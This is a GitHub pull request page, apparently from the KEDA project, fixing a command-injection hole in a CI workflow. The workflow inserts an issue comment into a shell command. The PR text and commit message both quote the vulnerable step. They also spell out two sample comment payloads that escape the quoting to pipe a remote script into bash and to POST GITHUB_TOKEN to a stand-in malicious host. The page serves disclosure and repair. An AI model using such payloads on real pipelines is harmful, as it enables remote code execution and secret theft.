Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Security Update pr-e2e.yml #4822

Merged
merged 1 commit into from Jul 26, 2023
Merged

Security Update pr-e2e.yml #4822

merged 1 commit into from Jul 26, 2023

Conversation

aashish-19
Copy link
Contributor

@aashish-19 aashish-19 commented Jul 26, 2023
edited by JorTurFer

pr-e2e.yml is vulnerable to RCE via command injection in comment body. Currently, the following block simply appends the comment body to the shell command. Since the comment body is under user's control, a malicious entity could create a comment such that it escapes the command meant to be executed and instead execute arbitrary commands, which could lead to a variety of security issues such as deletion of files and issues, exfiltration of environment variables to leak secrets, supply chain attack etc:

  • name: Run end to end tests
  • continue-on-error: true
  • id: test
  • env:
  • AWS_RUN_IDENTITY_TESTS: true
  • AZURE_RUN_AAD_POD_IDENTITY_TESTS: true
  • AZURE_RUN_WORKLOAD_IDENTITY_TESTS: true
  • GCP_RUN_IDENTITY_TESTS: true
  • E2E_IMAGE_TAG: ${{ needs.triage.outputs.image_tag }}
  • TEST_CLUSTER_NAME: keda-e2e-cluster-pr
  • run: |
  • MESSAGE="${{ github.event.comment.body }}"

A simple example of a malicious payload in the comment body can be:
Security"; curl https://malicious-site.com/malicious-script.sh | bash #
This would simply close the double quotes and it would curl a malicious script and pipe it to bash for execution. It will comment out rest of the command.

Similarly, to exfiltrate environment variables, a sample payload in the comment body can be:
Security"; $GITHUB_TOKEN > /tmp/env.txt && curl -X POST -d @/tmp/env.txt https://malicious-site.com/
This would first save the contents of the GITHUB_TOKEN environment variable in a file in the /tmp directory and then using curl send the contents of the file in a POST request to the attacker controlled web server.

Fixes GHSA-w92x-gx4w-j5f2
RCE via command injection in pr-e2e.yml

References
For more information about this vulnerability, please refer to the following resources:
Exploiting GitHub Actions on Open Source Projects
Vulnerabilities in CI/CD Pipelines of Popular Open-Source Projects
Vulnerable GitHub Actions Workflows

@aashish-19
Security Update pr-e2e.yml
1ea65f2 
pr-e2e.yml  is vulnerable to RCE via command injection in comment body.
Currently, the following block simply appends the comment body to the shell command. Since the comment body is under user's control, a malicious entity could create a comment such that it escapes the command meant to be executed and instead execute arbitrary commands, which could lead to a variety of security issues such as deletion of files and issues, exfiltration of environment variables to leak secrets, supply chain attack etc:
- name: Run end to end tests
        continue-on-error: true
        id: test
        env:
          AWS_RUN_IDENTITY_TESTS: true
          AZURE_RUN_AAD_POD_IDENTITY_TESTS: true
          AZURE_RUN_WORKLOAD_IDENTITY_TESTS: true
          GCP_RUN_IDENTITY_TESTS: true
          E2E_IMAGE_TAG: ${{ needs.triage.outputs.image_tag }}
          TEST_CLUSTER_NAME: keda-e2e-cluster-pr
        run: |
          MESSAGE="${{ github.event.comment.body }}"
          
A simple example of a malicious payload in the comment body can be:
Security"; curl https://malicious-site.com/malicious-script.sh | bash #
This would simply close the double quotes and it would curl a malicious script and pipe it to bash for execution. It will comment out rest of the command.

Similarly, to exfiltrate environment variables, a sample payload in the comment body can be:
Security"; $GITHUB_TOKEN > /tmp/env.txt && curl -X POST -d @/tmp/env.txt https://malicious-site.com/
This would first save the contents of the GITHUB_TOKEN environment variable in a file in the /tmp directory and then using curl send the contents of the file in a POST request to the attacker controlled web server.

Signed-off-by: Aashish Malhotra <74505547+aashish-19@users.noreply.github.com>
@aashish-19 aashish-19 requested a review from a team as a code owner July 26, 2023 02:46
@github-actions
Copy link

Thank you for your contribution! 🙏 We will review your PR as soon as possible.

🏖️ Over the summer, the response time will be longer than usual due to maintainers taking time off so please bear with us.

While you are waiting, make sure to:

Learn more about:

JorTurFer
JorTurFer approved these changes Jul 26, 2023
View reviewed changes
Copy link
Member

@JorTurFer JorTurFer left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

❤️ ❤️ ❤️ ❤️

This has been in my TODO list for a while :(
Luckily that code can't be executed by arbitrary users because previous steps require that the user is part of an specific org team, but fixing the issue is always better than restricting the attack vector

@JorTurFer JorTurFer enabled auto-merge (squash) July 26, 2023 07:30
@JorTurFer
Copy link
Member

/skip-e2e

@JorTurFer JorTurFer merged commit 89fb01a into kedacore:main Jul 26, 2023
21 checks passed
yoongon pushed a commit to yoongon/keda that referenced this pull request Aug 26, 2023
@aashish-19 @yoongon
Security Update pr-e2e.yml (kedacore#4822)
9ab6b18 
Signed-off-by: Yoon Park <yoongon.park@gmail.com>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@JorTurFer JorTurFer JorTurFer approved these changes

Assignees
No one assigned
Labels
skip-e2e
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
3 participants
@aashish-19 @JorTurFer @keda-automation